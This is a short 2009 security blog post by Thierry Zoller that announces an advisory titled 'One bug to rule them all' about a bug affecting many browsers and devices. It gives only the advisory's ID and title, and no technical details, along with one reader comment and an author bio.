Advisory: One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3....
[Wednesday, July 15, 2009 | 1 comment]

Subscribe to the RSS feed in case you are interested in updates
  • [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3....

1 comment

CG said... @ 16 July, 2009 15:04

thanks for not killing my PS3 ;-)

About Me

Thierry Zoller
Welcome to my personal Blog - In here I blog about Information Security and in general anything I regard as newsworthy. On the professional side I am currently working as an EMEA Practice Lead at Verizon Business for Threat and Vulnerability Management
